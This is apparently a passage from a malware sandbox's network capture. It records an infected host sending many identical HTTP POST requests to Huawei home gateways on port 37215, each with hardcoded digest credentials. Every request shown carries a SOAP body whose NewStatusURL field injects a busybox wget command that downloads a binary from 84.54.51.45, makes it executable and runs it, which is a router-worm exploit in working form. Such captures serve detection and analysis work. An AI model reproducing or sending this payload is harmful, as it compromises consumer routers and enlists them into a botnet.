                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            832192.168.2.154137441.197.25.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741342068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            833192.168.2.153513241.180.189.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741364956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            834192.168.2.155894041.192.119.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741399050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            835192.168.2.153418241.72.177.7537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741411924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            836192.168.2.153937041.182.171.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741446972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            837192.168.2.154340441.9.158.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741462946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            838192.168.2.154531241.125.75.3937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741492987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            839192.168.2.153795641.202.197.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741542101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            840192.168.2.155353841.0.206.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741565943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            841192.168.2.154168441.80.217.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741595030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
